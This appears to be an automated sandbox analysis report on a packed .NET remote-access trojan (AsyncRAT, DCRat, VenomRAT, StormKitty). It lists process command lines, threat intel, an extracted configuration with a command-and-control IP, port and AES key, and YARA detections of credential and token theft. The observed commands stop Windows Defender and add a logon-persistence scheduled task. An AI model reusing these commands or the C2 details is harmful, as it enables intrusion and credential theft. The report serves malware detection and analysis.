conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecurityHealthSystray.exe (PID: 1016 cmdline: SecurityHealthSystray MD5: 783C99AFD4C2AE6950FA5694389D2CFA)

whoami.exe (PID: 8152 cmdline: "C:\Windows\system32\whoami.exe" /groups MD5: A4A6924F3EAF97981323703D38FD99C4)

net1.exe (PID: 4196 cmdline: "C:\Windows\system32\net1.exe" stop windefend MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

WerFault.exe (PID: 5328 cmdline: C:\Windows\system32\WerFault.exe -u -p 7384 -s 2720 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

Infected.exe (PID: 3144 cmdline: "C:\Users\user\AppData\Local\Temp\Infected.exe" MD5: B8D455465260A845DB35492FDA5A8888)

cmd.exe (PID: 748 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7196 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 4824 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7184 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)

Loaader.exe (PID: 7392 cmdline: "C:\Users\user\AppData\Roaming\Loaader.exe" MD5: B8D455465260A845DB35492FDA5A8888)

WinDefend.exe (PID: 4768 cmdline: "C:\Users\user\AppData\Local\Temp\WinDefend.exe" MD5: 5FC6A541845FDAFB597DDFB98FA28B54)

Loaader.exe (PID: 7280 cmdline: C:\Users\user\AppData\Roaming\Loaader.exe MD5: B8D455465260A845DB35492FDA5A8888)

Loader.exe (PID: 7296 cmdline: C:\Users\user\AppData\Roaming\Loader.exe MD5: 7AC0ADF482250172280DEFEC7A7054DA)

WinDefend.exe (PID: 7572 cmdline: "C:\Users\user\AppData\Local\Temp\WinDefend.exe" MD5: 5FC6A541845FDAFB597DDFB98FA28B54)

WinDefend.exe (PID: 2132 cmdline: "C:\Users\user\AppData\Local\Temp\WinDefend.exe" MD5: 5FC6A541845FDAFB597DDFB98FA28B54)

whoami.exe (PID: 5308 cmdline: "C:\Windows\system32\whoami.exe" /groups MD5: A4A6924F3EAF97981323703D38FD99C4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: VenomRAT

{"Server": "66.235.168.242", "Ports": "3232", "Version": "", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "Loaader.exe", "AES_key": "tE8IGfk7UYxxW5jF9uxnGzkxU8UnVy3F", "Mutex": "iFe4z2UwXC6AffU6", "Certificate": "MIICKTCCAZKgAwIBAgIVAOwI49vECmkjcVi6vDRu+6lTwBelMA0GCSqGSIb3DQEBDQUAMF0xDjAMBgNVBAMMBUVCT0xBMRMwEQYDVQQLDApxd3FkYW5jaHVuMRwwGgYDVQQKDBNEY1JhdCBCeSBxd3FkYW5jaHVuMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjMwNjI0MTA1NzMxWhcNMzQwNDAyMTA1NzMwWjAQMQ4wDAYDVQQDDAVEY1JhdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAwLjfJLJldOS/ukdvNaxCeCKlqSDodMxbIlUBJFj4ifPzaijU+Qc9+Jdvhi6ZCNs9E/uBCzQd+fJoEornr5T4fZqOQIS2naeK29VzB3/xJlBW3faQNOQXicF/HSbX0ljWeGIbgZr/lpicEtjGgA1RGEt0zY2hVTNIufmV3WTYnLkCAwEAAaMyMDAwHQYDVR0OBBYEFE37VDHHP+vN1IXecEP/zz0inroMMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAaFlOwVBtr2Q4kDD0D5vcnSs/NiWSEKiRtNBVph0GxdbQXeE7epqNbjAM8aVZRDFw4hMP1gxetRk+Olcgp6/RDLzmei9uIydxJ8dk+KsCu0zWoL9yNWBx2BwVBNa7k3gAvh+CNuHFwb04ZG8kLR93TyFRZDUHUWglVnA3DQwJqrw=", "ServerSignature": "iMAOwDJA0vMpVx4GkSywNj1D9PkiTGYL8k2vajxwK0ZTkgcoy6ziEU37PU07UskWTqs4CQy9wpx58wUw1AAp0a59QrAxozzZ/IsZBApD2Cr3P8v6ZVT8lHLZwC7Rvm+MFMotN8SBl4jk9ACD4dSwXvpgx0mYcM4Mkw7WfxAX6J8=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "false", "AntiVM": "false"}

Threatname: AsyncRAT

{"Ports": ["3232"], "Server": ["66.235.168.242"], "Certificate": "MIICKTCCAZKgAwIBAgIVAOwI49vECmkjcVi6vDRu+6lTwBelMA0GCSqGSIb3DQEBDQUAMF0xDjAMBgNVBAMMBUVCT0xBMRMwEQYDVQQLDApxd3FkYW5jaHVuMRwwGgYDVQQKDBNEY1JhdCBCeSBxd3FkYW5jaHVuMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjMwNjI0MTA1NzMxWhcNMzQwNDAyMTA1NzMwWjAQMQ4wDAYDVQQDDAVEY1JhdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAwLjfJLJldOS/ukdvNaxCeCKlqSDodMxbIlUBJFj4ifPzaijU+Qc9+Jdvhi6ZCNs9E/uBCzQd+fJoEornr5T4fZqOQIS2naeK29VzB3/xJlBW3faQNOQXicF/HSbX0ljWeGIbgZr/lpicEtjGgA1RGEt0zY2hVTNIufmV3WTYnLkCAwEAAaMyMDAwHQYDVR0OBBYEFE37VDHHP+vN1IXecEP/zz0inroMMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAaFlOwVBtr2Q4kDD0D5vcnSs/NiWSEKiRtNBVph0GxdbQXeE7epqNbjAM8aVZRDFw4hMP1gxetRk+Olcgp6/RDLzmei9uIydxJ8dk+KsCu0zWoL9yNWBx2BwVBNa7k3gAvh+CNuHFwb04ZG8kLR93TyFRZDUHUWglVnA3DQwJqrw=", "Server Signature": "iMAOwDJA0vMpVx4GkSywNj1D9PkiTGYL8k2vajxwK0ZTkgcoy6ziEU37PU07UskWTqs4CQy9wpx58wUw1AAp0a59QrAxozzZ/IsZBApD2Cr3P8v6ZVT8lHLZwC7Rvm+MFMotN8SBl4jk9ACD4dSwXvpgx0mYcM4Mkw7WfxAX6J8="}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x955b:$b2: DcRat By qwqdanchun1

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Client.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Local\Temp\Client.exe	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf876:$q1: Select * from Win32_CacheMemory 0xf8b6:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf904:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf952:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
C:\Users\user\AppData\Roaming\Loader.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Roaming\Loader.exe	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf876:$q1: Select * from Win32_CacheMemory 0xf8b6:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf904:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf952:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
C:\Users\user\AppData\Local\Temp\Infected.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Local\Temp\Infected.exe	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xd1e8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xd236:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xd284:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
C:\Users\user\AppData\Local\Temp\Infected.exe	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xd7e4:$s1: DcRatBy
C:\Users\user\AppData\Roaming\Loaader.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Roaming\Loaader.exe	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xd1e8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xd236:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xd284:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
C:\Users\user\AppData\Roaming\Loaader.exe	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xd7e4:$s1: DcRatBy
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x125571:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x12b80b:$s1: \VPN\NordVPN 0x12b7f1:$s2: \VPN\OpenVPN 0x12b7d3:$s3: \VPN\ProtonVPN
00000014.00000002.2814130598.000000001D000000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x317cd:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x3171c:$s2: L2Mgc2NodGFza3MgL2
00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x20cfd:$b2: DcRat By qwqdanchun1
00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x96fb5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x97027:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x970b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x97143:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x971ad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x9721f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x972b5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x97345:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
00000003.00000002.2032453597.0000000002301000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x54b8:$b1: DcRatByqwqdanchun 0x29dfcd:$b2: DcRat By qwqdanchun1
00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000012.00000002.2097619560.0000000002B81000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x54a8:$b1: DcRatByqwqdanchun 0x29dfbd:$b2: DcRat By qwqdanchun1
00000015.00000002.3282228143.000000000313B000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x33c5:$b2: DcRat By qwqdanchun1
00000015.00000002.3282228143.0000000003126000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x1b05:$b2: DcRat By qwqdanchun1 0x9b75:$b2: DcRat By qwqdanchun1
00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x60b6f4:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000003.00000002.2031490283.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x4d0a5:$b2: DcRat By qwqdanchun1
00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x176f64:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x17d476:$s1: \VPN\NordVPN 0x17d45c:$s2: \VPN\OpenVPN 0x17d43e:$s3: \VPN\ProtonVPN
00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x558d5:$b2: DcRat By qwqdanchun1
00000015.00000002.3532252741.000000001BC21000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x22ac9:$b2: DcRat By qwqdanchun1 0x5f219:$b2: DcRat By qwqdanchun1
00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DcRat_2	Yara detected DcRat	Joe Security
00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x12a2c:$a2: timeout 3 > NUL 0x12a64:$a3: START "" " 0x5360:$b1: DcRatByqwqdanchun 0x3eb45:$b2: DcRat By qwqdanchun1
00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x1443c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000015.00000002.3532252741.000000001BBB4000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x98f9:$b2: DcRat By qwqdanchun1
00000012.00000002.2087235357.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x50b95:$b2: DcRat By qwqdanchun1
00000015.00000002.3282228143.00000000030CC000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x474d5:$b2: DcRat By qwqdanchun1
Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x17cbd:$a1: havecamera 0x2d264:$a1: havecamera 0x34e3c:$b1: DcRatByqwqdanchun
Process Memory Space: Client.exe PID: 6152	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Process Memory Space: Infected.exe PID: 3144	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: Infected.exe PID: 3144	JoeSecurity_DcRat_2	Yara detected DcRat	Joe Security
Process Memory Space: Infected.exe PID: 3144	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x59b4:$a1: havecamera 0x2e325:$a1: havecamera 0xd599:$b1: DcRatByqwqdanchun 0x14bba:$b1: DcRatByqwqdanchun 0x35f0a:$b1: DcRatByqwqdanchun 0x1c7f0:$b2: DcRat By qwqdanchun1 0x291fd:$b2: DcRat By qwqdanchun1
Process Memory Space: Loaader.exe PID: 7280	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x6416:$b1: DcRatByqwqdanchun 0xe04c:$b2: DcRat By qwqdanchun1 0x1d61c:$b2: DcRat By qwqdanchun1
Process Memory Space: Loader.exe PID: 7384	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: Loader.exe PID: 7384	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Loader.exe PID: 7384	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
Process Memory Space: Loaader.exe PID: 7392	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: Loaader.exe PID: 7392	JoeSecurity_DcRat_2	Yara detected DcRat	Joe Security
Process Memory Space: Loaader.exe PID: 7392	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Loaader.exe PID: 7392	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Loaader.exe PID: 7392	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0xd1403:$b1: DcRatByqwqdanchun 0x476b7:$b2: DcRat By qwqdanchun1 0xb67b4:$b2: DcRat By qwqdanchun1 0xbb6f2:$b2: DcRat By qwqdanchun1 0xcba40:$b2: DcRat By qwqdanchun1 0xdcdd9:$b2: DcRat By qwqdanchun1 0xdec11:$b2: DcRat By qwqdanchun1 0x118ee9:$b2: DcRat By qwqdanchun1 0x120d27:$b2: DcRat By qwqdanchun1
Process Memory Space: Loaader.exe PID: 7392	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x105c9e:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 48 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xd1e8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x1ce50:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x2cae8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xd236:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x1ce9e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x2cb36:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xd284:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x1ceec:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x2cb84:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xd7e4:$s1: DcRatBy 0x1d44c:$s1: DcRatBy 0x2d0e4:$s1: DcRatBy
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xd1e8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xd236:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xd284:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xd7e4:$s1: DcRatBy
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf876:$q1: Select * from Win32_CacheMemory 0x2210e:$q1: Select * from Win32_CacheMemory 0xf8b6:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x2214e:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf904:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x2219c:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf952:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x221ea:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xda76:$q1: Select * from Win32_CacheMemory 0xdab6:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xdb04:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xdb52:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
3.0.Infected.exe.30000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
3.0.Infected.exe.30000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xd1e8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xd236:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xd284:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
3.0.Infected.exe.30000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xd7e4:$s1: DcRatBy
20.2.Loader.exe.1d000000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x317cd:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x3171c:$s2: L2Mgc2NodGFza3MgL2
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xb3e8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xb436:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xb484:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xb9e4:$s1: DcRatBy
0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
